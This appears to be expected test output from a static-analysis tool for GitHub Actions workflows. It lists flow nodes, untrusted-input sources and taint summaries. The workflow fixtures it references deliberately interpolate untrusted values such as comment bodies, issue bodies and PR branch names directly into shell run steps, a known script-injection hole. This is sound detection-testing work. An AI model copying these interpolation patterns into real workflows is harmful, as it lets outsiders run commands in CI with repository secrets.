on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | * | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual 